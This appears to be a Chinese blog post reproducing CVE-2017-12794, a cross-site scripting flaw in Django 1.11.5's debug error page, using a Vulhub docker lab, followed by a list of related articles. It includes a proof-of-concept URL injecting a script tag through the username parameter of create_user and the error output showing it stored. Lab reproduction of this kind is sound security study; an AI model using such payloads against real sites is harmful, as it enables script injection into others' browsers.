【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

过期的秋刀鱼-2023-11-05 14:46

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明 内容
漏洞编号 CVE-2017-12794
漏洞名称 Django_debug page_XSS漏洞
漏洞评级
影响范围 1.11.5版本
漏洞描述
修复方案

1.1、漏洞描述

1.11.5版本,修复了500页面中存在的一个XSS漏洞

1.2、漏洞等级

1.3、影响版本

Django 1.11.5版本

1.4、漏洞复现

1、基础环境

Path:Vulhub/django/CVE-2017-12794

启动测试环境:

bash 复制代码 
sudo docker-compose up -d

访问http://your-ip:8000/即可看到

2、漏洞分析

vulhub

3、漏洞验证
复制代码 
http://192.168.8.8:8000/create_user/?username=%3Cscript%3Ealert(1)%3C/script%3E

用户已经被 创建

再次刷新页面触发XSS

抛出异常

python 复制代码 
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL:  Key (username)=(<script>alert(1)</script>) already exists.
相关推荐
PythonicCC5 分钟前
Django核心知识点详解:JSON、AJAX、Cookie、Session与用户认证
ajax·django·json
该用户已不存在13 分钟前
不知道这些工具,难怪的你的Python开发那么慢丨Python 开发必备的6大工具
前端·后端·python
Monkey的自我迭代1 小时前
Python标准库:时间与随机数全解析
前端·python·数据挖掘
小王子10241 小时前
Django+DRF 实战:自定义异常处理流程
后端·django·web开发
SsummerC1 小时前
【leetcode100】下一个排列
python·算法·leetcode
Kelaru2 小时前
本地Qwen中医问诊小程序系统开发
python·ai·小程序·flask·project
Menger_Wen2 小时前
分析新旧因子相关性
python·机器学习·区块链
A5rZ2 小时前
xss利用搜索侧信道 -- GPN CTF 2025 smile-at-me
xss
胆大的2 小时前
XSStrike 进行 XSS 漏洞测试
xss·安全性测试
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02集群聊天服务器---MySQL数据库的建立03Coze扣子平台完整体验和实践(附国内和国际版对比)04免费领50刀!AnyRouter一键解锁Claude最强编程模型05Java学习第十五部分——MyBatis06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07RAL-2025 | 触觉助力无人机空中探索!基于柔顺机器人手指的无人机触觉导航08基于odoo17的设计模式详解---单例模式09DeepSeek各版本说明与优缺点分析10浅谈几种js设计模式